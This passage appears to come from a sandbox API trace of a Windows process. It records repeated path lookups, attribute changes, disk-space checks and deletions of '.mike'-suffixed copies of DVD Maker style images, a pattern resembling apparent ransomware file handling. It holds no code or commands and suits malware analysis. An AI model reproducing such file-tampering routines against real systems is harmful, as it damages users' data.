Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", lpFilePart=0x0) returned 0x4d [0054.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.849] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0054.850] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.850] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.850] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png.mike")) returned 1 [0054.852] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", lpFilePart=0x0) returned 0x53 [0054.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.862] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0054.862] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.863] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png.mike")) returned 1 [0054.865] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.865] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4f [0054.866] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", lpFilePart=0x0) returned 0x4a [0054.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4f [0054.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4f [0054.870] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0054.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4f [0054.871] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png.mike")) returned 1 [0054.873] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x55 [0054.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", lpFilePart=0x0) returned 0x50 [0054.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x55 [0054.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x55 [0054.878] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0054.878] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x55 [0054.879] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x55 [0054.879] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png.mike")) returned 1 [0054.881] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.881] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", lpFilePart=0x0) returned 0x4c [0054.881] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", lpFilePart=0x0) returned 0x47 [0054.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", lpFilePart=0x0) returned 0x4c [0054.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", lpFilePart=0x0) returned 0x4c [0054.885] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", dwFileAttributes=0x80) returned 0 [0054.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", lpFilePart=0x0) returned 0x4c [0054.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike", lpFilePart=0x0) returned 0x4c [0054.886] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png.mike")) returned 1 [0054.888] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.888] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x52 [0054.889] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", lpFilePart=0x0) returned 0x4d [0054.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x52 [0054.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x52 [0054.893] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", dwFileAttributes=0x80) returned 0 [0054.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x52 [0054.894] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x52 [0054.894] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png.mike")) returned 1 [0054.896] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", lpFilePart=0x0) returned 0x49 [0054.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", lpFilePart=0x0) returned 0x44 [0054.900] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", lpFilePart=0x0) returned 0x49 [0054.900] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", lpFilePart=0x0) returned 0x49 [0054.900] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", dwFileAttributes=0x80) returned 0 [0054.901] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", lpFilePart=0x0) returned 0x49 [0054.901] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike", lpFilePart=0x0) returned 0x49 [0054.901] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png.mike")) returned 1 [0054.904] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.904] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4a [0054.904] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", lpFilePart=0x0) returned 0x45 [0054.909] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4a [0054.910] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4a [0054.910] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0054.911] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4a [0054.911] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x4a [0054.911] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png.mike")) returned 1 [0054.913] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.913] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x50 [0054.914] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", lpFilePart=0x0) returned 0x4b [0054.918] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x50 [0054.918] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x50 [0054.918] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0054.919] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x50 [0054.919] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x50 [0054.919] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png.mike")) returned 1 [0054.921] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.921] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", lpFilePart=0x0) returned 0x47 [0054.921] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", lpFilePart=0x0) returned 0x42 [0054.925] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", lpFilePart=0x0) returned 0x47 [0054.925] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", lpFilePart=0x0) returned 0x47 [0054.925] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", dwFileAttributes=0x80) returned 0 [0054.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", lpFilePart=0x0) returned 0x47 [0054.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike", lpFilePart=0x0) returned 0x47 [0054.926] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png.mike")) returned 1 [0054.932] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD 